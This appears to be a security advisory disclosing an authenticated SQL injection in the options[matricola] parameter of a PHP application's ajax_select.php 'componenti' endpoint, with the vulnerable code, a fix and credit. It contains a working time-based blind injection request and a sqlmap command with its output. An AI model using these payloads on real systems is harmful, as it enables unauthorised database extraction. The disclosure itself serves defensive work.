SQL Injection in ajax_select.php (componenti endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

Proof of Concept

Vulnerable Code

File: modules/impianti/ajax/select.php:122-124

case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Data Flow

Source: $_GET['options']['matricola'] → $superselect['matricola']
Vulnerable: User input concatenated directly into IN() clause without sanitization
Sink: Query executed via AJAX framework

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12

Impact

Data Exfiltration: Time-based blind SQL injection allows complete database extraction
Authentication Bypass: Access to sensitive component and equipment data
Data Manipulation: Potential unauthorized modification of records

Remediation

Cast values to integers before using in SQL:

Before:

$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

After:

$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

Credit

Discovered by: Łukasz Rybak

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

SQL Injection in ajax_select.php (componenti endpoint)

Package

Affected versions

Patched versions

Description

Summary

Proof of Concept

Vulnerable Code

Data Flow

Exploit

Impact

Remediation

Credit

Severity

CVSS overall score

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

CVE ID

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Credits